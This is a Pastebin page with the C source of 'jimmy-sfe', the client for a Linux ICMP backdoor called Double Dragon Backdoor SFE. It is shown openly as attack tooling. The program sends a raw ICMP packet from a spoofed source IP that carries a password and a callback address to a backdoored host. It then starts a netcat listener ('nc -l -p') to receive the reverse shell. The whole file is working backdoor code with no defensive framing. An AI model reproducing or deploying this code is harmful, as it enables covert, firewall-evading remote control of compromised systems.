Advertisement
FlyFar

jimmy-sfe.c

Jun 6th, 2023
658
1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.64 KB | Cybersecurity | 1 0
  1. /*
  2.          Double Dragon Backdoor SFE (Special Firewall Edition)
  3.                 by tHE rECIdjVO <recidjvo@pkcrew.org>
  4.  
  5.                    Member of the Packet Knights Crew
  6.                         http://www.pkcrew.org/
  7.  
  8.                         ---> Player 2: Jimmy
  9.                                 */
  10.  
  11. // Set here the ICMP type
  12. #define ICMP_TYPE 0
  13.  
  14. #define PROGRAM "jimmy-sfe"
  15. #define AUTHOR "tHE rECIdjVO <recidjvo@pkcrew.org>"
  16.  
  17. #include <stdio.h>
  18. #include <stdlib.h>
  19. #include <string.h>
  20. #include <netdb.h>
  21. #include <sys/types.h>
  22. #include <sys/socket.h>
  23. #include <netinet/in.h>
  24. #include <netinet/ip.h>
  25. #include <netinet/ip_icmp.h>
  26.  
  27. // Data to send
  28. struct cb_data{
  29.     char pass[30];
  30.     u_long jimmy_ip;
  31.     u_short jimmy_port;
  32. };
  33.  
  34. int main(int argc, char *argv[]);
  35. void send_icmp(char *argv[]);
  36. u_long resolv(char *hostname);
  37. u_short in_chksum(u_short *,int);
  38.  
  39. int main(int argc, char *argv[])
  40. {
  41.     char commandline[64];
  42.  
  43.     if(argc != 6) {
  44.         printf(PROGRAM " by " AUTHOR "\n");
  45.         printf("usage: %s <ranzou_addr> <ranzou_pass> <jimmy_ip> <jimmy_port> <spoofed_ip>\n", argv[0]);
  46.         exit(0);
  47.     }
  48.  
  49.     bzero(commandline, 64);
  50.     sprintf(commandline, "nc -l -p %s", argv[4]);
  51.     // Send ICMP packet to initialize the callback
  52.     send_icmp(argv);
  53.     // Run netcat to accept the callback connection
  54.     system(commandline);
  55.     exit(0);
  56. }
  57.  
  58. void send_icmp(char *argv[])
  59. {
  60.     struct cb_data *pdata;
  61.     struct ip *pip;
  62.     struct icmp *picmp;
  63.     struct sockaddr_in from;
  64.     int sock;
  65.     char *packet;
  66.     int hincl = 1;
  67.  
  68.     // Create the raw socket
  69.     if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
  70.         printf("socket() error.\nAre you really root?\n");
  71.         exit(1);
  72.     }
  73.     // Get privileges to modify the ip header
  74.     if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&hincl,sizeof(hincl)) < 0) {
  75.         printf("setsockopt() error.\n");
  76.         close(sock);
  77.         exit(1);
  78.     }
  79.  
  80.     // Set pointers
  81.     packet = malloc(sizeof(struct ip) + sizeof(struct icmp) + 64);
  82.     pip = (struct ip *)packet;
  83.     picmp = (struct icmp *)(packet + sizeof(struct ip));
  84.     pdata = (struct cb_data *)(packet + sizeof(struct ip) + sizeof(struct icmp));
  85.     memset(packet, 0, sizeof(struct ip) + sizeof(struct icmp) + 64);
  86.     // Initialize the ICMP fields
  87.     from.sin_addr.s_addr = resolv(argv[1]);
  88.     from.sin_family = AF_INET;
  89.     pip->ip_len = htons(sizeof(struct ip) + sizeof(struct icmp) + 64);
  90.     pip->ip_hl = 5;
  91.     pip->ip_v = 4;
  92.     pip->ip_ttl = 255;
  93.     pip->ip_tos = 0;
  94.     pip->ip_off = 0;
  95.     pip->ip_id = htons(getpid());
  96.     pip->ip_p = 1;
  97.     pip->ip_src.s_addr = resolv(argv[5]);
  98.     pip->ip_dst.s_addr = resolv(argv[1]);
  99.     pip->ip_sum = in_chksum((u_short *)pip,20);
  100.     picmp->icmp_type = ICMP_TYPE;
  101.     picmp->icmp_code = 0;
  102.     strcpy(pdata->pass, argv[2]);
  103.     pdata->jimmy_ip = resolv(argv[3]);
  104.     pdata->jimmy_port = atoi(argv[4]);
  105.     picmp->icmp_cksum = in_chksum((u_short *)picmp, sizeof(struct icmp) + 64);
  106.  
  107.     // Finally, send the packet
  108.     sendto(sock, packet, sizeof(struct ip) + sizeof(struct icmp) + 64, 0, (struct sockaddr *)&from ,sizeof(struct sockaddr_in));
  109. }
  110.  
  111. u_long resolv(char *hostname) {
  112.         // Resolve hostnames to IPv4
  113.  
  114.         u_long ipb;
  115.         struct hostent *hp;
  116.  
  117.         if((hp = gethostbyname(hostname)) == NULL) {
  118.                 return(0);
  119.         }
  120.         memcpy(&ipb, hp->h_addr, hp->h_length);
  121.         return(ipb);
  122. }
  123.  
  124. u_short in_chksum(u_short *ptr, int nbytes)
  125. {
  126.     // Checksum
  127.     register long sum;
  128.     u_short oddbyte;
  129.     register u_short answer;
  130.     sum = 0;
  131.     while(nbytes > 1) {
  132.         sum += *ptr++;
  133.         nbytes -= 2;
  134.     }
  135.     if (nbytes == 1) {
  136.         oddbyte = 0;
  137.         *((u_char *) &oddbyte) = *(u_char *)ptr;
  138.         sum += oddbyte;
  139.     }
  140.  
  141.     sum  = (sum >> 16) + (sum & 0xffff);
  142.     sum += (sum >> 16);
  143.     answer = ~sum;
  144.  
  145.     return((u_short) answer);
  146. }
Tags: Linux Backdoor
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement